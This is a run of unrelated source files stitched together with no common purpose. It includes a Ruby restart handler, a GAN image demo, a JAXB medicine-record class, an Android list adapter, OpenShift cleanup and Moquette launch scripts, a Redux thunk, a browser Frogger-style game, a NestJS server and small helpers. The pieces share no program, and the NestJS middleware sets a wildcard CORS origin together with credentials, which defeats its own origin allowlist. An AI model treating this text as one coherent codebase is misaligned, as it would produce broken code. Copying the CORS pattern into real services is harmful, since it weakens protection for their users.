      Thread.new do
        sleep 1
        Kernel.exec($0, *ARGV)
      end
      <<~RESTART
        <!DOCTYPE html>
        <html>
        <head><title>restart</title></head>
        <body>
        <h1>MDServer restart</h1>
        <pre>#{$0} #{ARGV.join(' ')}</pre>
        </body>
        </html>
      RESTART
    end
  end
end
# Generate an image from a text caption using a pretrained CAttnGAN model.
from picturate.config import CAttnGANConfig
from picturate.nets import CAttnGAN

# Load the 'bird' model configuration and its pretrained weights.
config = CAttnGANConfig('bird')
gan = CAttnGAN(config, pretrained=True)

caption = "This little bird is blue with short beak and white underbelly"
filename = 'bird'

# Render the caption to an image written out under `filename`.
gan.generate_image(caption, filename)
import Article from './article' import Audio from './audio' import Book from './book' import Code from './code' import Event from './event' import Instagram from './instagram' import JS from './js' import ReactIcon from './react' import Tech from './tech' import Video from './video' export { Article, Audio, Book, Code, Event, Instagram, JS, ReactIcon, Tech, Video }
/**
 * Returns the index of the first decimal digit in {@code s}, or -1 when the
 * string contains no digit.
 */
public static int findFirstNumberPos(String s) {
    // Scan left to right and bail out at the first digit.
    for (int idx = 0, n = s.length(); idx < n; idx++) {
        if (Character.isDigit(s.charAt(idx))) {
            return idx;
        }
    }
    return -1;
}
package org.opentele.server.dgks.monitoringdataset.version1_0_1.generated; import javax.xml.bind.annotation.XmlAccessType; import javax.xml.bind.annotation.XmlAccessorType; import javax.xml.bind.annotation.XmlElement; import javax.xml.bind.annotation.XmlSchemaType; import javax.xml.bind.annotation.XmlType; import javax.xml.datatype.XMLGregorianCalendar; /** * <p>Java class for DrugEffectuationType complex type. * * <p>The following schema fragment specifies the expected content contained within this class. * * <pre> * &lt;complexType name="DrugEffectuationType"> * &lt;complexContent> * &lt;restriction base="{http://www.w3.org/2001/XMLSchema}anyType"> * &lt;sequence> * &lt;element ref="{http://www.dkma.dk/medicinecard/xml.schema/2008/06/01}EffectuationIdentifier"/> * &lt;element name="CreatedDateTime" type="{http://www.w3.org/2001/XMLSchema}dateTime"/> * &lt;element ref="{http://www.dkma.dk/medicinecard/xml.schema/2008/06/01}DrugName"/> * &lt;element ref="{http://www.dkma.dk/medicinecard/xml.schema/2008/06/01}DrugFormText"/> * &lt;element ref="{http://www.dkma.dk/medicinecard/xml.schema/2008/06/01}DrugStrengthText"/> * &lt;element ref="{http://www.dkma.dk/medicinecard/xml.schema/2009/01/01}DosageFreeText"/> * &lt;element name="AccordingToNeed" type="{http://www.w3.org/2001/XMLSchema}boolean" minOccurs="0"/> * &lt;element ref="{http://www.dkma.dk/medicinecard/xml.schema/2009/01/01}IndicationFreeText" minOccurs="0"/> * &lt;element ref="{http://www.dkma.dk/medicinecard/xml.schema/2008/06/01}ATCCode"/> * &lt;element name="CreatedBy" type="{http://www.w3.org/2001/XMLSchema}string"/> * &lt;/sequence> * &lt;/restriction> * &lt;/complexContent> * &lt;/complexType> * </pre> * * */ @XmlAccessorType(XmlAccessType.FIELD) @XmlType(name = "DrugEffectuationType", propOrder = { "effectuationIdentifier", "createdDateTime", "drugName", "drugFormText", "drugStrengthText", "dosageFreeText", "accordingToNeed", "indicationFreeText", "atcCode", "createdBy" }) public class 
DrugEffectuationType { @XmlElement(name = "EffectuationIdentifier", namespace = "http://www.dkma.dk/medicinecard/xml.schema/2008/06/01") protected long effectuationIdentifier; @XmlElement(name = "CreatedDateTime", required = true) @XmlSchemaType(name = "dateTime") protected XMLGregorianCalendar createdDateTime; @XmlElement(name = "DrugName", namespace = "http://www.dkma.dk/medicinecard/xml.schema/2008/06/01", required = true) protected String drugName; @XmlElement(name = "DrugFormText", namespace = "http://www.dkma.dk/medicinecard/xml.schema/2008/06/01", required = true) protected String drugFormText; @XmlElement(name = "DrugStrengthText", namespace = "http://www.dkma.dk/medicinecard/xml.schema/2008/06/01", required = true) protected String drugStrengthText; @XmlElement(name = "DosageFreeText", namespace = "http://www.dkma.dk/medicinecard/xml.schema/2009/01/01", required = true) protected String dosageFreeText; @XmlElement(name = "AccordingToNeed") protected Boolean accordingToNeed; @XmlElement(name = "IndicationFreeText", namespace = "http://www.dkma.dk/medicinecard/xml.schema/2009/01/01") protected String indicationFreeText; @XmlElement(name = "ATCCode", namespace = "http://www.dkma.dk/medicinecard/xml.schema/2008/06/01", required = true) protected String atcCode; @XmlElement(name = "CreatedBy", required = true) protected String createdBy; /** * Gets the value of the effectuationIdentifier property. * */ public long getEffectuationIdentifier() { return effectuationIdentifier; } /** * Sets the value of the effectuationIdentifier property. * */ public void setEffectuationIdentifier(long value) { this.effectuationIdentifier = value; } /** * Gets the value of the createdDateTime property. * * @return * possible object is * {@link XMLGregorianCalendar } * */ public XMLGregorianCalendar getCreatedDateTime() { return createdDateTime; } /** * Sets the value of the createdDateTime property. 
* * @param value * allowed object is * {@link XMLGregorianCalendar } * */ public void setCreatedDateTime(XMLGregorianCalendar value) { this.createdDateTime = value; } /** * Gets the value of the drugName property. * * @return * possible object is * {@link String } * */ public String getDrugName() { return drugName; } /** * Sets the value of the drugName property. * * @param value * allowed object is * {@link String } * */ public void setDrugName(String value) { this.drugName = value; } /** * Gets the value of the drugFormText property. * * @return * possible object is * {@link String } * */ public String getDrugFormText() { return drugFormText; } /** * Sets the value of the drugFormText property. * * @param value * allowed object is * {@link String } * */ public void setDrugFormText(String value) { this.drugFormText = value; } /** * Gets the value of the drugStrengthText property. * * @return * possible object is * {@link String } * */ public String getDrugStrengthText() { return drugStrengthText; } /** * Sets the value of the drugStrengthText property. * * @param value * allowed object is * {@link String } * */ public void setDrugStrengthText(String value) { this.drugStrengthText = value; } /** * Gets the value of the dosageFreeText property. * * @return * possible object is * {@link String } * */ public String getDosageFreeText() { return dosageFreeText; } /** * Sets the value of the dosageFreeText property. * * @param value * allowed object is * {@link String } * */ public void setDosageFreeText(String value) { this.dosageFreeText = value; } /** * Gets the value of the accordingToNeed property. * * @return * possible object is * {@link Boolean } * */ public Boolean isAccordingToNeed() { return accordingToNeed; } /** * Sets the value of the accordingToNeed property. * * @param value * allowed object is * {@link Boolean } * */ public void setAccordingToNeed(Boolean value) { this.accordingToNeed = value; } /** * Gets the value of the indicationFreeText property. 
* * @return * possible object is * {@link String } * */ public String getIndicationFreeText() { return indicationFreeText; } /** * Sets the value of the indicationFreeText property. * * @param value * allowed object is * {@link String } * */ public void setIndicationFreeText(String value) { this.indicationFreeText = value; } /** * Gets the value of the atcCode property. * * @return * possible object is * {@link String } * */ public String getATCCode() { return atcCode; } /** * Sets the value of the atcCode property. * * @param value * allowed object is * {@link String } * */ public void setATCCode(String value) { this.atcCode = value; } /** * Gets the value of the createdBy property. * * @return * possible object is * {@link String } * */ public String getCreatedBy() { return createdBy; } /** * Sets the value of the createdBy property. * * @param value * allowed object is * {@link String } * */ public void setCreatedBy(String value) { this.createdBy = value; } }
/* * Copyright (C) 2016 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.android.example.wordlistsql; import android.content.Context; import android.content.Intent; import android.support.v7.widget.RecyclerView; import android.util.Log; import android.view.LayoutInflater; import android.view.View; import android.view.ViewGroup; import android.widget.Button; import android.widget.CheckBox; import android.widget.CompoundButton; import android.widget.TextView; import android.widget.Toast; import java.util.ArrayList; import java.util.List; /** * Implements a simple Adapter for a RecyclerView. * Demonstrates how to add a click handler for each item in the ViewHolder. */ public class WordListAdapter extends RecyclerView.Adapter<WordListAdapter.WordViewHolder> { WordListOpenHelper mDB; /** * Custom view holder with a text view and two buttons. 
*/ class WordViewHolder extends RecyclerView.ViewHolder { public final TextView wordItemView; public final TextView fechaItemView; public final TextView horaItemView; public final CheckBox checkBoxItemView; public final TextView completadoItemView; public WordViewHolder(View itemView) { super(itemView); wordItemView = (TextView) itemView.findViewById(R.id.tareamostrada); fechaItemView = (TextView) itemView.findViewById(R.id.fechamostrada); horaItemView = (TextView) itemView.findViewById(R.id.horamostrada); checkBoxItemView = (CheckBox) itemView.findViewById(R.id.tareaterminada); completadoItemView= (TextView) itemView.findViewById(R.id.completado); } } private static final String TAG = WordListAdapter.class.getSimpleName(); public static final String EXTRA_ID = "ID"; public static final String EXTRA_WORD = "WORD"; private final LayoutInflater mInflater; Context mContext; public WordListAdapter(Context context, WordListOpenHelper db ) { mInflater = LayoutInflater.from(context); mContext = context; mDB = db; } @Override public WordViewHolder onCreateViewHolder(ViewGroup parent, int viewType) { View itemView = mInflater.inflate(R.layout.wordlist_item, parent, false); return new WordViewHolder(itemView); } @Override public void onBindViewHolder(WordViewHolder holder, int position) { WordItem current = mDB.query(position); holder.wordItemView.setText(current.getWord()); holder.fechaItemView.setText(current.getDay()); holder.horaItemView.setText(current.getHour()); // Keep a reference to the view holder for the click listener final WordViewHolder h = holder; // needs to be final for use in callback // Attach a click listener to the DELETE button. 
holder.checkBoxItemView.setOnCheckedChangeListener(new MyButtonOnClickListener (current.getId(),null) { @Override public void onCheckedChanged(CompoundButton buttonView, boolean isChecked) { if(isChecked){ Toast.makeText( buttonView.getContext(), "Check super works!!", Toast.LENGTH_SHORT).show(); Intent i = new Intent(buttonView.getContext(), completedTasks.class); mContext.startActivity(i); h.checkBoxItemView.setChecked(false); } } }); /** holder.delete_button.setOnClickListener( new MyButtonOnClickListener(current.getId(),null){ @Override public void onClick(View v ) { int deleted = mDB.delete(id); if (deleted >= 0) notifyItemRemoved(h.getAdapterPosition()); } }); */ } @Override public int getItemCount() { // Placeholder so we can see some mock data. return (int) mDB.count(); } }
#!/usr/bin/env bash
# Build the nvidiagpubeat Docker image from the Dockerfile in the current
# directory and tag it with the 20180925 release tag.
docker build -t claudiofahey/nvidiagpubeat:20180925 .
import React from 'react'; import { PNG, Diagram, GeneralIcon } from 'rediagram'; import { GCP, CloudLoadBalancing, InvizGCP, CloudDNS, ComputeEngine, Zone, CloudStorage, CloudSQL, } from '@rediagram/gcp'; PNG( <Diagram title="Content Management"> <InvizGCP> <GeneralIcon name="iOS/Android/Web" type="Mobile client" upstream={['DNS', 'Load Balancer']} /> <GeneralIcon name="Publisher" type="Client" upstream={['Content Server2']} /> <GCP> <CloudDNS name="DNS" /> <CloudLoadBalancing name="Load Balancer" upstream={['Content Server1', 'Content Server2']} /> <Zone title="Zone A"> <ComputeEngine name="Content Server1" description="Auto Scaling" upstream={['Static Content', 'Dynamic Content']} /> </Zone> <Zone title="Zone B"> <ComputeEngine name="Content Server2" description="Auto Scaling" upstream={['Static Content', 'Dynamic Content']} /> </Zone> <CloudStorage name="Static Content" /> <CloudSQL name="Dynamic Content" /> </GCP> </InvizGCP> </Diagram>, );
#!/bin/bash . $(dirname ${BASH_SOURCE})/../../util.sh rm -fr $(relative project/api-router) oc delete dc api-router-app --namespace=demos oc delete bc api-router-app --namespace=demos oc delete svc api-router-app --namespace=demos oc delete svc api-router --namespace=demos oc delete is api-router-app --namespace=demos oc delete template api-router-app --namespace=demos oc delete build $(oc get builds | grep -i complete | grep api-router-app | awk '{print $1}') oc delete pod $(oc get pod | grep Completed | awk '{print $1}') oc delete route api-router oc delete is fis-java-openshift --namespace=demos oc delete is fis-karaf-openshift --namespace=demos docker rmi -f $(docker images | grep api-router-app | awk '{print $3}')
#!/bin/bash python app.py ./config.json ./issuance_request_config.json ./presentation_request_config.json
import { API } from 'aws-amplify'

// Action type constants.
export const GET_FRIDGE = 'GET_FRIDGE'
export const GET_FRIDGE_SUCCESS = 'GET_FRIDGE_SUCCESS'
export const GET_FRIDGE_FAILURE = 'GET_FRIDGE_FAILURE'
export const ADD_ITEM_TO_FRIDGE = 'ADD_ITEM_TO_FRIDGE'
export const AUTHORIZED_USER = 'AUTHORIZED_USER'
export const GET_PRODUCTS = 'GET_PRODUCTS'
export const LOGOUT = 'LOGOUT'
export const CLEAR_PRODUCTS = 'CLEAR_PRODUCTS'

// Plain Redux action creators.
export const authUser = (user) => ({
  type: AUTHORIZED_USER,
  payload: user,
})

export const clearProducts = () => ({ type: CLEAR_PRODUCTS })

export const logout = () => ({
  type: LOGOUT,
})

export const addToFridge = (itemInfo) => ({
  type: ADD_ITEM_TO_FRIDGE,
  payload: itemInfo
})

export const getProducts = (products) => ({
  type: GET_PRODUCTS,
  payload: products
})

export const getFridge = () => ({
  type: GET_FRIDGE,
})

export const getFridgeSuccess = (fridgeItems) => ({
  type: GET_FRIDGE_SUCCESS,
  payload: fridgeItems,
})

export const getFridgeFailure = () => ({
  type: GET_FRIDGE_FAILURE,
})

/**
 * Thunk: load the fridge items belonging to `user`.
 *
 * Dispatches GET_FRIDGE immediately, then GET_FRIDGE_SUCCESS with the
 * response payload, or GET_FRIDGE_FAILURE if the API call throws.
 *
 * Fixes vs. previous revision: removed the stray `<gh_stars>` artifact line
 * (a syntax error), leftover console.log debugging, and a redundant `await`
 * on the non-promise `response.data` property.
 */
export function fetchFridge(user) {
  const apiName = 'globalindextest'
  const path = '/fridgeitems'
  const params = {
    response: true, // ask Amplify for the full Axios-style response object
    queryStringParameters: {
      username: user.username
    }
  }
  return async (dispatch) => {
    dispatch(getFridge())
    try {
      const response = await API.get(apiName, path, params)
      // With `response: true`, the payload lives on `response.data`.
      dispatch(getFridgeSuccess(response.data))
    } catch (error) {
      dispatch(getFridgeFailure())
    }
  }
}
"use strict"; // BUG FIX: was `"use strict;"` — with the semicolon inside the
              // quotes this was an ordinary string literal, so strict mode
              // was never actually enabled.

/* Classes */
const Game = require('./game.js');
const Player = require('./player.js');
const Log = require('./log.js');
const Log2 = require('./log2.js');
const Car = require('./car.js');

/* Global variables */
var canvas = document.getElementById('screen');
var game = new Game(canvas, update, render);
var player = new Player({x: 0, y: 240});
var background = new Image();
background.src = 'assets/background.png';
var lives = 3;
var log = [];
var car = [];

// River section: three columns of logs at x = 460 / 540 / 620.
for(var i=0; i < 3; i++) {
  log.push(new Log({ x: 460, y: 100 + 250*i }));
  log.push(new Log2({ x: 540, y: 0 + 150*i }));
  log.push(new Log({ x: 620, y: 100 + 200*i }));
}
// Road section: two columns of cars plus two extra staggered cars.
for(var i=0; i < 2; i++) {
  car.push(new Car({ x: 80, y: 0 + 320*i }));
  car.push(new Car({ x: 240, y: 0 + 320*i }));
}
car.push(new Car({ x: 160, y: 250 }));
car.push(new Car({ x: 315, y: 300 }));

// Keyboard input: a move is only accepted while the player is idle so a
// hop animation cannot be interrupted mid-flight.
window.onkeydown = function(event) {
  event.preventDefault();
  switch(event.keyCode) {
    // RIGHT (arrow or D)
    case 39:
    case 68:
      if(player.state == "idle") {
        player.state = "right";
        player.frame = -1;
      }
      break;

    // LEFT (arrow or A)
    case 37:
    case 65:
      if(player.state == "idle") {
        player.state = "left";
        player.frame = -1;
      }
      break;

    // DOWN (arrow or S)
    case 40:
    case 83:
      if(player.state == "idle") {
        player.state = "down";
        player.frame = -1;
      }
      break;

    // UP (arrow or W)
    case 38:
    case 87:
      if(player.state == "idle") {
        player.state = "up";
        player.frame = -1;
      }
      break;
  }
}

/**
 * @function masterLoop
 * Advances the game in sync with the refresh rate of the screen
 * @param {DOMHighResTimeStamp} timestamp the current time
 */
var masterLoop = function(timestamp) {
  game.loop(timestamp);
  window.requestAnimationFrame(masterLoop);
}
masterLoop(performance.now());

/**
 * @function loseLife
 * Returns the player to the starting tile and consumes a life; flags game
 * over when no lives remain. (Extracted — this reset sequence was duplicated
 * in update() and checkForCarCrash().)
 */
function loseLife() {
  player.x = 0;
  player.y = 240;
  player.frame = 0;
  player.state = "idle";
  player.position = 0;
  lives--;
  if(lives == 0) {
    game.gameOver = true;
  }
}

/**
 * @function update
 * Updates the game state, moving game objects and handling interactions
 * between them.
 * @param {DOMHighResTimeStamp} elapsedTime indicates
 * the number of milliseconds passed since the last frame.
 */
function update(elapsedTime) {
  player.update(elapsedTime);
  log.forEach(function(l) { l.update(); });
  car.forEach(function(c) { c.update(); });

  // Difficulty scales with score: obstacle speed grows as score/100.
  for(var i = 0; i < car.length; i++) {
    car[i].speed = player.score/100;
  }
  for(var i = 0; i < log.length; i++) {
    log[i].speed = player.score/100;
  }

  if(player.x > 70 && player.x < 375) {
    // Road band: dying on contact with any car.
    car.forEach(checkForCarCrash);
  } else if (player.x > 455 && player.x < 680) {
    // River band: dying unless standing on at least one log.
    var onLog = log.some(checkOnLog);
    if(!onLog) {
      loseLife();
    }
  }
}

/**
 * @function render
 * Renders the current game state into a back buffer.
 * @param {DOMHighResTimeStamp} elapsedTime indicates
 * the number of milliseconds passed since the last frame.
 * @param {CanvasRenderingContext2D} ctx the context to render to
 */
function render(elapsedTime, ctx) {
  ctx.drawImage(background, 0, 0, canvas.width, canvas.height);
  log.forEach(function(l){l.render(ctx);});
  car.forEach(function(c){c.render(ctx);});
  player.render(elapsedTime, ctx);

  // HUD: score and remaining lives.
  ctx.fillStyle = "yellow";
  ctx.font = "bold 16px Arial";
  ctx.fillText("Score: " + player.score, 0, 15);
  ctx.fillStyle = "yellow";
  ctx.font = "bold 16px Arial";
  ctx.fillText("Lives: " + lives, 1, 30);
  if(game.gameOver) {
    ctx.fillStyle = "red";
    ctx.font = "bold 32px Arial";
    ctx.fillText("Game Over", 760/2 - 90, 480/2);
  }
}

/**
 * @function checkForCarCrash
 * Axis-aligned bounding-box test against one car; on overlap the player
 * loses a life.
 */
function checkForCarCrash(c) {
  var collides = !(player.x + player.width < c.x ||
                   player.x > c.x + c.width ||
                   player.y + player.height < c.y ||
                   player.y > c.y + c.height);
  if(collides) {
    loseLife();
  }
}

/**
 * @function checkOnLog
 * Axis-aligned bounding-box test against one log.
 * @return {boolean} true when the player overlaps the log
 */
function checkOnLog(l) {
  var collides = !(player.x + player.width < l.x ||
                   player.x > l.x + l.width ||
                   player.y + player.height < l.y ||
                   player.y > l.y + l.height);
  return collides;
}
<reponame>darrendanvers/exp-download package blog.drmidnite.expdownloadapi; import java.io.IOException; import javax.servlet.http.HttpServletResponse; import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.PathVariable; import org.springframework.web.bind.annotation.RestController; @RestController public class Endpoint { // Basic test, accessible at http://localhost:8080/. @GetMapping public String get() { return "OK"; } // Mocks up an endpoint that is generating a file for download. Accessible at http://localhost:8080/test/download.txt. // You can replace "test" with whatever. @GetMapping("/{id}/download.txt") public void doDownload(@PathVariable("id")String id, HttpServletResponse response) throws IOException { response.getWriter().print("You requested resource "); response.getWriter().print(id); response.getWriter().println(" from the Java server."); } }
// global variables below let inner, tileWidth, tileHeight; let radius = 100; let tiles = 1;//tiles per side let height = 100 * radius / 2 * 3 ** 0.5 * tiles; let width = 30 * radius * tiles; while(width > height) { width -= radius } function mouseClicked() { background(random(80, 180), random(60, 100), 100); // background(240, 245, 255); for (let y = 0; y <= height / radius + 10; y ++) { for (let x = 0; x <= width / (3 * radius); x ++) { centY = (y + 0) * radius / 2 * (3 ** 0.5); centX = x * 3 * radius + radius * ((y+ 1) % 2) * 1.5; if (centY <= random(300, height + 100)) { makeRect(centX, centY, random(5, max(5, (height - centY) / 35))); } } } save("polygonalrain.jpg"); } function makeRect(centerX, centerY, n) { for (let i = 0; i < n; i++) { thisRadius = random(0, radius); fill(random(80, 180), random(60, 100), 100); beginShape(); for (let angle = 0; angle < 360; angle += 60) { currentRadius = max(0, min(radius, randomGaussian(thisRadius, radius / 20))); vertex(centerX + currentRadius * cos(angle), centerY + currentRadius * sin(angle)); } endShape(CLOSE); } } function setup() { inner = document.getElementById('P5Canvas').getBoundingClientRect(); let canvas = createCanvas(width, height); canvas.parent('P5Canvas'); document.getElementById('clearButton').onclick = function() {clearCanvas()} document.getElementById('saveButton').onclick = function() { saveCanvas('myCanvas', 'png'); } // additional setup stroke(35, 17, 10, 255); noFill(); noStroke(); angleMode(DEGREES); mouseClicked(); } function clearCanvas() { let inner = document.getElementById('P5Canvas').getBoundingClientRect(); clear(); }
import {NestFactory} from '@nestjs/core'; import {AppModule} from './app.module'; async function bootstrap() { const app = await NestFactory.create(AppModule, {cors: true}); app.use(function (req, res, next) { const allowedOrigins = ['http://127.0.0.1:3000', 'http://localhost:3000', 'http://localhost:4200', 'https://manage.dein.li']; const origin = req.headers.origin; if (allowedOrigins.indexOf(origin) > -1) { res.setHeader('Access-Control-Allow-Origin', origin); } res.setHeader('Access-Control-Allow-Origin', '*'); res.header('Access-Control-Allow-Methods', 'GET, OPTIONS, POST, PUT, DELETE, HEAD'); res.header('Access-Control-Allow-Headers', 'Content-Type, Authorization, If-None-Match'); res.header('Access-Control-Allow-Credentials', true); res.header('access-control-expose-headers', 'etag'); return next(); }); await app.listen(3000); } bootstrap();
<filename>src/app/libs/date.spec.ts import * as date from './date'; describe('a date module', () => { it('should contain method now', () => { expect(date.now).toEqual(jasmine.any(Function)); }); describe('method now', () => { it('should return a number', () => { expect(date.now()).toEqual(jasmine.any(Number)); }); it('should return a number if using polyfill', () => { expect(date.polyfill.now()).toEqual(jasmine.any(Number)); }); }); });
#!/bin/sh
#
# Copyright (c) 2012-2015 Andrea Selva
#
# Moquette MQTT broker launcher: prints a banner, resolves the installation
# directory (following symlinks), locates a JVM, assembles GC/diagnostic
# options and starts io.moquette.broker.Server in the foreground.

echo " "
echo " ___ ___ _ _ ___ ________ _____ _____ "
echo " | \/ | | | | | | \/ | _ |_ _|_ _| "
echo " | . . | ___ __ _ _ _ ___| |_| |_ ___ | . . | | | | | | | | "
echo " | |\/| |/ _ \ / _\ | | | |/ _ \ __| __/ _ \ | |\/| | | | | | | | | "
echo " | | | | (_) | (_| | |_| | __/ |_| || __/ | | | \ \/' / | | | | "
echo " \_| |_/\___/ \__, |\__,_|\___|\__|\__\___| \_| |_/\_/\_\ \_/ \_/ "
echo " | | "
echo " |_| "
echo " "
echo " version: 0.16-SNAPSHOT "

# Run relative to the script's own directory.
cd "$(dirname "$0")"

# resolve links - $0 may be a softlink
PRG="$0"

while [ -h "$PRG" ]; do
    ls=`ls -ld "$PRG"`
    link=`expr "$ls" : '.*-> \(.*\)$'`
    if expr "$link" : '/.*' > /dev/null; then
        PRG="$link"
    else
        PRG=`dirname "$PRG"`/"$link"
    fi
done

# Get standard environment variables
PRGDIR=`dirname "$PRG"`

# Only set MOQUETTE_HOME if not already set
[ -f "$MOQUETTE_HOME"/bin/moquette.sh ] || MOQUETTE_HOME=`cd "$PRGDIR/.." ; pwd`
export MOQUETTE_HOME

# Set JavaHome if it exists
if [ -f "${JAVA_HOME}/bin/java" ]; then
    JAVA=${JAVA_HOME}/bin/java
else
    # Fall back to whatever `java` is on the PATH.
    JAVA=java
fi
export JAVA

LOG_FILE=$MOQUETTE_HOME/config/moquette-log.properties
MOQUETTE_PATH=$MOQUETTE_HOME/
#LOG_CONSOLE_LEVEL=info
#LOG_FILE_LEVEL=fine
# Always capture a heap dump on OOM; headless since the broker has no UI.
JAVA_OPTS_SCRIPT="-XX:+HeapDumpOnOutOfMemoryError -Djava.awt.headless=true"

## Use the Hotspot garbage-first collector.
JAVA_OPTS="$JAVA_OPTS -XX:+UseG1GC"

## Have the JVM do less remembered set work during STW, instead
## preferring concurrent GC. Reduces p99.9 latency.
JAVA_OPTS="$JAVA_OPTS -XX:G1RSetUpdatingPauseTimePercent=5"

## Main G1GC tunable: lowering the pause target will lower throughput and vise versa.
## 200ms is the JVM default and lowest viable setting
## 1000ms increases throughput. Keep it smaller than the timeouts.
JAVA_OPTS="$JAVA_OPTS -XX:MaxGCPauseMillis=500"

## Optional G1 Settings
# Save CPU time on large (>= 16GB) heaps by delaying region scanning
# until the heap is 70% full. The default in Hotspot 8u40 is 40%.
#JAVA_OPTS="$JAVA_OPTS -XX:InitiatingHeapOccupancyPercent=70"

# For systems with > 8 cores, the default ParallelGCThreads is 5/8 the number of logical cores.
# Otherwise equal to the number of cores when 8 or less.
# Machines with > 10 cores should try setting these to <= full cores.
#JAVA_OPTS="$JAVA_OPTS -XX:ParallelGCThreads=16"

# By default, ConcGCThreads is 1/4 of ParallelGCThreads.
# Setting both to the same value can reduce STW durations.
#JAVA_OPTS="$JAVA_OPTS -XX:ConcGCThreads=16"

### GC logging options -- uncomment to enable
JAVA_OPTS="$JAVA_OPTS -XX:+PrintGCDetails"
#JAVA_OPTS="$JAVA_OPTS -XX:+PrintGCDateStamps"
#JAVA_OPTS="$JAVA_OPTS -XX:+PrintHeapAtGC"
#JAVA_OPTS="$JAVA_OPTS -XX:+PrintTenuringDistribution"
#JAVA_OPTS="$JAVA_OPTS -XX:+PrintGCApplicationStoppedTime"
#JAVA_OPTS="$JAVA_OPTS -XX:+PrintPromotionFailure"
#JAVA_OPTS="$JAVA_OPTS -XX:PrintFLSStatistics=1"
#JAVA_OPTS="$JAVA_OPTS -Xloggc:/var/log/moquette/gc.log"
JAVA_OPTS="$JAVA_OPTS -Xloggc:$MOQUETTE_HOME/gc.log"
#JAVA_OPTS="$JAVA_OPTS -XX:+UseGCLogFileRotation"
#JAVA_OPTS="$JAVA_OPTS -XX:NumberOfGCLogFiles=10"
#JAVA_OPTS="$JAVA_OPTS -XX:GCLogFileSize=10M"

# Netty buffer-leak detection at maximum sensitivity (development setting).
JAVA_OPTS="$JAVA_OPTS -Dio.netty.leakDetectionLevel=paranoid"

# NOTE(review): single quotes mean this echoes the literal command template,
# with unexpanded $JAVA/$JAVA_OPTS — presumably intentional as a usage hint,
# but confirm; double quotes would print the resolved command.
echo '$JAVA -server $JAVA_OPTS $JAVA_OPTS_SCRIPT -Dlog4j.configuration="file:$LOG_FILE" -Dmoquette.path="$MOQUETTE_PATH" -cp "$MOQUETTE_HOME/lib/*" io.moquette.broker.Server'

$JAVA -server $JAVA_OPTS $JAVA_OPTS_SCRIPT -Dlog4j.configuration="file:$LOG_FILE" -Dmoquette.path="$MOQUETTE_PATH" -cp "$MOQUETTE_HOME/lib/*" io.moquette.broker.Server
def calculateFrameTime(): fps = 60 frame_time = 1000 / fps # Calculate the time in milliseconds for each frame return frame_time
<gh_stars>0 import shutil import pathlib import pytest @pytest.fixture def doculect_dir(tmp_path): d = tmp_path / 'doculect' shutil.copytree(pathlib.Path(__file__).parent / 'doculect', d) return d
def generate_list(n): lst = [] for i in range(1, n+1): lst.append(i) return lst
/*
 *
 */
package net.community.chest.awt.event;

import java.awt.event.MouseEvent;
import java.awt.event.MouseListener;
import java.util.Arrays;
import java.util.Collections;
import java.util.List;

import net.community.chest.util.collection.CollectionsUtils;

/**
 * <P>Copyright GPLv2</P>
 *
 * <P>Maps each AWT mouse event id to the {@link MouseListener} method that
 * consumes it, so events can be dispatched generically by id via
 * {@link #invoke(MouseListener, MouseEvent)}.</P>
 *
 * @author <NAME>.
 * @since May 4, 2009 12:01:16 PM
 */
public enum MouseEventType implements ListenerEventEnum<MouseListener,MouseEvent> {
    CLICKED(MouseEvent.MOUSE_CLICKED) {
        /*
         * @see net.community.chest.awt.event.ListenerEventEnum#invoke(java.util.EventListener, java.awt.AWTEvent)
         */
        @Override
        public void invoke (MouseListener l, MouseEvent e)
        {
            if ((null == l) || (null == e))
                return;    // debug breakpoint
            l.mouseClicked(e);
        }
    },
    PRESSED(MouseEvent.MOUSE_PRESSED) {
        /*
         * @see net.community.chest.awt.event.ListenerEventEnum#invoke(java.util.EventListener, java.awt.AWTEvent)
         */
        @Override
        public void invoke (MouseListener l, MouseEvent e)
        {
            if ((null == l) || (null == e))
                return;    // debug breakpoint
            l.mousePressed(e);
        }
    },
    RELEASED(MouseEvent.MOUSE_RELEASED) {
        /*
         * @see net.community.chest.awt.event.ListenerEventEnum#invoke(java.util.EventListener, java.awt.AWTEvent)
         */
        @Override
        public void invoke (MouseListener l, MouseEvent e)
        {
            if ((null == l) || (null == e))
                return;    // debug breakpoint
            l.mouseReleased(e);
        }
    },
    ENTERED(MouseEvent.MOUSE_ENTERED) {
        /*
         * @see net.community.chest.awt.event.ListenerEventEnum#invoke(java.util.EventListener, java.awt.AWTEvent)
         */
        @Override
        public void invoke (MouseListener l, MouseEvent e)
        {
            if ((null == l) || (null == e))
                return;    // debug breakpoint
            l.mouseEntered(e);
        }
    },
    EXITED(MouseEvent.MOUSE_EXITED) {
        /*
         * @see net.community.chest.awt.event.ListenerEventEnum#invoke(java.util.EventListener, java.awt.AWTEvent)
         */
        @Override
        public void invoke (MouseListener l, MouseEvent e)
        {
            if ((null == l) || (null == e))
                return;    // debug breakpoint
            l.mouseExited(e);
        }
    };

    // AWT event id (e.g. MouseEvent.MOUSE_CLICKED) backing this constant.
    private final int _eventId;
    /*
     * @see net.community.chest.awt.event.ListenerEventEnum#getEventId()
     */
    @Override
    public final int getEventId ()
    {
        return _eventId;
    }
    /*
     * @see net.community.chest.awt.event.ListenerEventEnum#getEventClass()
     */
    @Override
    public final Class<MouseEvent> getEventClass ()
    {
        return MouseEvent.class;
    }
    /*
     * @see net.community.chest.awt.event.ListenerEventEnum#getListenerClass()
     */
    @Override
    public final Class<MouseListener> getListenerClass ()
    {
        return MouseListener.class;
    }

    MouseEventType (int eventId)
    {
        _eventId = eventId;
    }

    // Cached immutable view of values() to avoid re-cloning the array.
    public static final List<MouseEventType> VALUES=Collections.unmodifiableList(Arrays.asList(values()));
    // Case-insensitive name lookup; returns null when no constant matches.
    public static final MouseEventType fromString (final String s)
    {
        return CollectionsUtils.fromString(VALUES, s, false);
    }
    // Reverse lookup from the AWT event id; returns null when unknown.
    public static final MouseEventType fromEventId (final int id)
    {
        return ListenerEventEnumUtils.fromEventId(id, VALUES);
    }
    // Convenience overload: null-safe lookup from an event instance.
    public static final MouseEventType fromEventId (final MouseEvent e)
    {
        return (null == e) ? null : fromEventId(e.getID());
    }
}
